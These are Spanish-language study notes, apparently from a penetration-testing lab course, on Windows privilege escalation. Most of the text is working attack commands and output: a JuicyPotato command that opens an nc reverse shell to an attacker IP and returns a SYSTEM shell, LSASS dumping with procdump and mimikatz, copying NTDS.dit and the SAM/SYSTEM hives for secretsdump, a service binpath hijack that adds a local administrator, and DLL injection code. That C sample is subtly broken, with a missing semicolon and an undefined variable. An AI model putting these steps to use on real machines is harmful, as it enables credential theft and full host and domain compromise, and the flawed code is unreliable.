Windows Privilege Escalation
Tool |
Description |
Seatbelt |
C# project for performing a wide variety of local privilege escalation checks |
winPEAS |
WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. All of the checks are explained here |
PowerUp |
PowerShell script for finding common Windows privilege escalation vectors that rely on misconfigurations. It can also be used to exploit some of the issues found |
SharpUp |
C# version of PowerUp |
JAWS |
PowerShell script for enumerating privilege escalation vectors written in PowerShell 2.0 |
SessionGopher |
SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information |
Watson |
Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities. |
LaZagne |
Tool used for retrieving passwords stored on a local machine from web browsers, chat tools, databases, Git, email, memory dumps, PHP, sysadmin tools, wireless network configurations, internal Windows password storage mechanisms, and more |
Windows Exploit Suggester - Next Generation |
WES-NG is a tool based on the output of Windows’ systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10 is supported |
Sysinternals Suite |
We will use several tools from Sysinternals in our enumeration including AccessChk, PipeList, and PsService |
|
|
SeImpersonate and SeAssignPrimaryToken
SeImpersonate example - Juicy Potato
- Muchas veces cuando conseguimos un acceso a un usuario de un servicio, o sea una service account como puede ser sql server, al revisar los privilegios de ese usuario, vemos que tiene el privilegio SeImpersonate..
- Podemos utilizar juicypotato para conseguir un token de servicio con el privilegio SeImpersonate.
- Juicy potato es un script de windows que nos permite obtener un token de servicio con privilegios elevados.
- https://github.com/ohpe/juicy-potato
- Explota privilegios via DCOM/NTLM (SeImpersonate).
JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *
- explicación del comando:
-l 53375
es el puerto que se va a utilizar para la comunicación.
-p c:\windows\system32\cmd.exe
es la ruta de la binary que se va a ejecutar.
-a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe"
es la argumento que se va a pasar a la binary que se va a ejecutar.
-t *
es el token de servicio que se va a utilizar.
Rogue Potato
- RoguePotato es un script de windows que nos permite obtener un token de servicio con privilegios elevados.
SQL (WINLPE-SRV01\sql_dev dbo@master)> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.195 8443 -e cmd.exe" -t *
output
----------------------------------------------------------
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 53375
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
NULL
[+] CreateProcessWithTokenW OK
[+] calling 0x000000000088ce08
NULL
SQL (WINLPE-SRV01\sql_dev dbo@master)>
- Ahora en nuestra maquina atacante podemos escuchar en el puerto 8443.
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.14.195] from (UNKNOWN) [10.129.43.43] 49686
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
SeDebugPrivilege
- Muchas veces cuando conseguimos un acceso a un usuario de un servicio, o sea una service account como puede ser sql server, al revisar los privilegios de ese usuario, vemos que tiene el privilegio SeDebugPrivilege.
- Podemos usar ProcDump de Sysinternals para conseguir un un dump de memoria LSASS.
procdump.exe -accepteula -ma lsass.exe lsass.dmp
- Ahora con esto podemos usar pypykatz en nuestra maquina atacante, o mimikatz en la maquina victima para obtener las credenciales de los servicios.
mimikatz # log
Using 'mimikatz.log' for logfile : OK
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...
pypykatz lsa minidump 'lsass (1).dmp'
- De todas formas siempre podemos dumpear a mano con el task manager.

RCE con SeDebugPrivilege
- Se pueden elevar los privilegios ejecutando un proceso hijo con privilegios eleveados heredando los privilegios de un proceso padre.
- Podemos utilizar el siguiente script
[MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")
Migrar proceso lsass a un proceso con SeDebugPrivilege
- Si tenemos el privilegio SeDebugPrivilege podemos migrar el proceso lsass.
PS C:\Users\Public> Get-Process lsass
Get-Process lsass
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
1299 32 7200 19236 5.56 672 0 lsass
meterpreter > migrate 672
[*] Migrating from 6648 to 672...
[*] Migration completed successfully.
meterpreter > getsystem
[-] Already running as SYSTEM
SeTakeOwnerPrivilege
- Este privilegio permite la habilidad de tomar ownership de cualquier objeto.
- NTFS, Registry, File, Process, Thread, Semaphore, Mutex, Desktop, Window Station, Message Queue, Job, and Section.
- Este privilegio asigna permisos WRITE_OWNER para el objeto especificado.
- Se puede intentar habilitar este privilegio usando el siguieunte script
PS C:\htb> Import-Module .\Enable-Privilege.ps1
PS C:\htb> .\EnableAllTokenPrivs.ps1
PS C:\htb> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ======================================== =======
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
- Después tenemos que elegir un archivo objetivo para la operación de tomar ownership.
- Ejemplo:
cmd /c dir /q 'C:\Department Shares\Private\IT'
- Explicación del comando:
cmd
es el comando que se va a ejecutar.
/c
es la opción que indica que se va a ejecutar el comando.
dir
es el comando que se va a ejecutar.
/q
es la opción que indica que se va a mostrar el resultado de la operación.
'C:\Department Shares\Private\IT'
es el objetivo de la operación de tomar ownership.
- `takeown /f ‘C:\Department Shares\Private\IT\cred.txt’
icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F
- Ahora con esto podemos tomar ownership de un archivo.
En donde conviene usar esta técnica de tomar ownership
c:\inetpub\wwwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
SeBackupPrivilege
- Este privilegio permite la habilidad de leer cualquier archivo del sistema y realizar copias de seguridad de esos archivos.
Get-SeBackupPrivilege
- Se puede intentar habilitar este privilegio usando el siguieunte script
PS C:\htb> Set-SeBackupPrivilege
PS C:\htb> Get-SeBackupPrivilege
SeBackupPrivilege is enabled
Copiar un archivo protegido
PS C:\htb> Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt
Atacando el DC, copiando NTDS.dit
- Este grupo también nos permite hacer cosas interesantes como tomar el NTSD.dit del DC y copiarlo en una maquina que no tenga permisos de administrador..
- Este archivo contiene hashes NTLM de todos los usuarios bajo el dominio.
- Podemos utilizar diskshadow para copiar el disco C y exponerlo como disco E.
PS C:\htb> diskshadow.exe
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC, 10/14/2020 12:57:52 AM
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
PS C:\htb> dir E:
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
Copiando los registros SAM y SYSTEM
- Este privilegio también nos permite copiar los registros SAM y SYSTEM. Lo cual nos permite extraer credenciales de los usuarios mediante impacket-secretsdump.
C:\htb> reg save HKLM\SYSTEM SYSTEM.SAV
The operation completed successfully.
C:\htb> reg save HKLM\SAM SAM.SAV
The operation completed successfully.
impacket-secretsdump -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
Usando robocopy para copiar archivos
- Robocopy es un programa de Windows que nos permite copiar archivos de manera recursiva.
C:\htb> robocopy /B E:\Windows\NTDS .\ntds ntds.dit
- Muchas veces los servicios corren con permisos debiles y podemos abusar de esto cambiando el path de su binario.
- Para enumearar podemos utilizar SharpUp.
PS C:\htb> .\SharpUp.exe audit
Reemplazando el binario de un servicio
C:\htb> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
C:\htb> sc start SecurityService
Cambiando el path binario de un servicio
C:\htb> sc config WindscribeService binpath="cmd /c net localgroup administrators USER /add"
sc stop WindscribeService
sc start WindscribeService
net localgroup administrators
Enumerar servicios ejecutandose
get-process
: Enumera los procesos que se estan ejecutando.
get-process -Id <pid>
: Enumera el proceso con el id especificado.
get-service
: Enumera los servicios que se estan ejecutando.
DLL injection
- La idea es metemr un trozo de código dentro de un DLL que se carga en un proceso activo.
- Esta tecnica permite ejecutar código en el contexto de un proceso.
LoadLibrary
LoadLibrary
es una función de la API de Windows que carga una DLL en la memoria de un proceso.
- Código C:
#include <windows.h> // windows API
#include <stdio.h> // standard I/O
int main() {
// Using LoadLibrary to load a DLL into the current process
HMODULE hModule = LoadLibrary("example.dll");
if (hModule == NULL) {
printf("Failed to load example.dll\n");
return -1;
}
printf("Successfully loaded example.dll\n");
return 0;
}
Ejemplo de DLL injection
#include <windows.h>
#include <stdio.h>
int main() {
// Using LoadLibrary for DLL injection
// First, we need to get a handle to the target process
DWORD targetProcessId = 123456 // The ID of the target process
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetProcessId);
if (hProcess == NULL) {
printf("Failed to open target process\n");
return -1;
}
// Next, we need to allocate memory in the target process for the DLL path
LPVOID dllPathAddressInRemoteMemory = VirtualAllocEx(hProcess, NULL, strlen(dllPath), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (dllPathAddressInRemoteMemory == NULL) {
printf("Failed to allocate memory in target process\n");
return -1;
}
// Write the DLL path to the allocated memory in the target process
BOOL succeededWriting = WriteProcessMemory(hProcess, dllPathAddressInRemoteMemory, dllPath, strlen(dllPath), NULL);
if (!succeededWriting) {
printf("Failed to write DLL path to target process\n");
return -1;
}
// Get the address of LoadLibrary in kernel32.dll
LPVOID loadLibraryAddress = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
if (loadLibraryAddress == NULL) {
printf("Failed to get address of LoadLibraryA\n");
return -1;
}
// Create a remote thread in the target process that starts at LoadLibrary and points to the DLL path
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)loadLibraryAddress, dllPathAddressInRemoteMemory, 0, NULL);
if (hThread == NULL) {
printf("Failed to create remote thread in target process\n");
return -1;
}
printf("Successfully injected example.dll into target process\n");
return 0;
}